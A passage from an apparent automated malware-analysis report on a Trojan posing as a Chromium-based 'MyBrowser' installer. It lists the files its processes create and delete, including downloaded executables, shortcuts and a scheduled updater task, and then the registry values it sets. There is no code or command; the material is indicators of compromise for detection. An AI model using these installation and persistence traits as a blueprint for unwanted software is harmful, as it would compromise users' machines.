%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\sv.pak (207 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\kn.pak (1768 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\el.pak (1667 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\PepperFlash\manifest.json (2 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ms.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\hi.pak (1712 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\bg.pak (1640 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\sw.pak (208 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\nacl64.exe (12288 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\libexif.dll (303 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ta.pak (1784 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\sl.pak (211 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\fa.pak (308 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\es-419.pak (226 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\libglesv2.dll (5442 bytes)
%Documents and Settings%\All Users\Desktop\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\sk.pak (229 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\en-GB.pak (189 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\nb.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\uk.pak (1621 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\en-US.pak (189 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\chrome.7z (1161171 bytes)
The Trojan deletes the following file(s):
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840 (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\wow_helper.exe (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp (0 bytes)
%Program Files%\MyBrowser\MyBrowser (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\prefs (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\mybrowser.exe (0 bytes)
The process setup.exe:240 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\id.pak (231 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\zh-CN.pak (214 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\chrome.7z (1135976 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\chrome_elf.dll (124 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\VisualElements\splash-620x300.png (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\pt-BR.pak (251 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\zh-TW.pak (216 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\secondarytile.png (637 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\45.0.2433.0\Installer\setup.exe (7345 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\lv.pak (264 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\uk.pak (1687 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\d3dcompiler_47.dll (22433 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\nb.pak (236 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\bn.pak (1829 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\fil.pak (264 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\sr.pak (1670 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\es.pak (265 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\mr.pak (1802 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\fi.pak (244 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\chrome_installer.log (999 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\nacl_irt_x86_32.nexe (17629 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\kn.pak (3668 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\natives_blob.bin (1685 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\te.pak (1862 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\it.pak (254 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\fr.pak (278 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ml.pak (3734 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\chrome_child.dll (335724 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\es-419.pak (260 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\icudtl.dat (75554 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\libegl.dll (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ms.pak (236 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\sw.pak (238 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet Quick Access.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ko.pak (265 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\lt.pak (259 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\en-US.pak (214 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ru.pak (1673 bytes)
%Documents and Settings%\%current user%\Desktop\Internet Quick Access.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\fa.pak (1648 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\da.pak (236 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\el.pak (1745 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\chrome_watcher.dll (1657 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Internet Quick Access\Internet Quick Access.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ta.pak (3681 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\de.pak (258 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\sk.pak (268 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\chrome_200_percent.pak (7972 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ar.pak (1629 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\he.pak (297 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\nacl_irt_x86_64.nexe (23407 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\VisualElements\smalllogo.png (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\sv.pak (237 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\metro_driver.dll (1793 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\hi.pak (1809 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\45.0.2433.0.manifest (248 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\resources.pak (130562 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\vi.pak (289 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\pt-PT.pak (256 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Extensions\external_extensions.json (99 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\chrome.dll (299767 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\snapshot_blob.bin (1713 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\gu.pak (1796 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\cs.pak (260 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\pl.pak (255 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\bg.pak (1705 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\chrome.exe (3700 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\delegate_execute.exe (3760 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\am.pak (1640 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\hr.pak (246 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\et.pak (230 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\libglesv2.dll (9606 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ca.pak (261 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\chrome_100_percent.pak (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\wow_helper.exe (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\sl.pak (243 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ro.pak (264 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\nacl64.exe (15021 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\VisualElementsManifest.xml (401 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\th.pak (1788 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\hu.pak (274 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\nl.pak (249 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\tr.pak (256 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\VisualElements\logo.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\libexif.dll (308 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ja.pak (311 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\en-GB.pak (214 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\wow_helper.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\chrome.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium (0 bytes)
The process tmp24.tmp.exe:1492 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\CR_5E130.tmp\setup.exe (16808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_5E130.tmp\SETUP.EX_ (1612 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_5E130.tmp\CHROME.PACKED.7Z (274744 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\CR_5E130.tmp\setup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_5E130.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_5E130.tmp\SETUP.EX_ (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_5E130.tmp\CHROME.PACKED.7Z (0 bytes)
The process nsj1B.tmp:1648 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\6481.exe (14022 bytes)
The process dwwin.exe:2404 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\87D37.dmp (226144 bytes)
The process nsu5.tmp:468 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nssE.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj1B.tmp (123415 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso13.tmp (9352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QXGRCP0F\installer[1].exe (123415 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq18.tmp (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk14.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\prepreinstaller_win[1].exe (20400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq21.tmp (20400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf1F.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1D.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (60 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso12.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj1A.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QXGRCP0F\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GJ6ZM961\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst19.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqC.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GJ6ZM961\cmmdWriter[1].exe (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Uninstall.exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QXGRCP0F\vos[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (90 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssF.tmp (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst10.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\setup[1].exe (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmD.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp17.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsbA.tmp (13911 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg20.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\LRP8nPI[1].exe (9352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr22.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsj1B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso1E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq18.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf1F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QXGRCP0F\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj1A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg20.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr22.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (0 bytes)
The process nssF.tmp:1668 makes changes in the file system.
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsy11.tmp (0 bytes)
The process avg23.exe:1836 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\f9626892-7a78-3199-abd2-97bbce96297b\adv_128.exe (1188412 bytes)
The process %original file name%.exe:1364 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsi4.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu5.tmp (8184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GJ6ZM961\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf7.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QXGRCP0F\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso2.tmp (7384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk6.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl8.tmp (15 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsi4.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk6.tmp (0 bytes)
The process adv_128.exe:1660 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\tmp25.tmp (718712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp24.tmp.exe (275838 bytes)
The process FlashPlayerUpdateService.exe:3536 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Tasks\Adobe Flash Player Updater.job (830 bytes)
Registry activity
The process nsq18.tmp:1164 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "24 3D F5 81 13 52 7B 6A BE 9C 65 3A 50 71 42 A2"
[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"
[HKCU\Software\Crossbrowse]
"Preinstall" = "1"
The process 6471.exe:1916 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\6548]
"setup.exe" = "MyBrowser Installer"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Tempo]
"(Default)" = "Tempo"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
